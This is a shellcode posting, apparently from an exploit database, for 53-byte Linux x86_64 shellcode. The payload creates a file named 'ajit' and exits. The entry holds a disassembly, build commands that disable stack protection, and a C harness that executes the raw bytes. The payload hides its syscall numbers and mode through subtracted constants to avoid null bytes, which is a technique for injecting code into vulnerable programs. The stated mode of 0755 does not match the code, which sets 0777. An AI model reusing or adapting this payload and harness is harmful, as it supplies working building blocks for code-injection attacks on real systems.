Share
## https://sploitus.com/exploit?id=1337DAY-ID-33701
/*
---------------------------------------------------------------------------------------------------
Linux/x86_x64 - sys_creat("ajit", 0755) - 53 bytes
Ajith Kp [ http://fb.com/ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Vishnu Nath Kp [ http://www.terminalcoders.blogspot.com ]
Sayooj S Nambiar [ http://fb.com/sayooj.sivadas ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
0000000000400080 <.text>:
400080: eb 2a jmp 0x4000ac
400082: 5f pop %rdi
400083: 68 e0 f2 5b 2e pushq $0x2e5bf2e0
400088: 5e pop %rsi
400089: 48 81 ee e1 f0 5b 2e sub $0x2e5bf0e1,%rsi
400090: 68 e0 f2 5b 2e pushq $0x2e5bf2e0
400095: 58 pop %rax
400096: 48 2d 8b f2 5b 2e sub $0x2e5bf28b,%rax
40009c: 0f 05 syscall
40009e: 68 e0 f2 5b 2e pushq $0x2e5bf2e0
4000a3: 58 pop %rax
4000a4: 48 2d a4 f2 5b 2e sub $0x2e5bf2a4,%rax
4000aa: 0f 05 syscall
4000ac: e8 d1 ff ff ff callq 0x400082
4000b1: 61 (bad)
4000b2: 6a 69 pushq $0x69
4000b4: 74 .byte 0x74
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o syscreat_shellcode_linux_x64 syscreat_shellcode_linux_x64.c -z execstack
$ ./syscreat_shellcode_linux_x64
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x2a\x5f\x68\xe0\xf2\x5b\x2e\x5e\x48\x81\xee\xe1\xf0\x5b\x2e\x68\xe0\xf2\x5b\x2e\x58\x48\x2d\x8b\xf2\x5b\x2e\x0f\x05\x68\xe0\xf2\x5b\x2e\x58\x48\x2d\xa4\xf2\x5b\x2e\x0f\x05\xe8\xd1\xff\xff\xff\x61\x6a\x69\x74";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}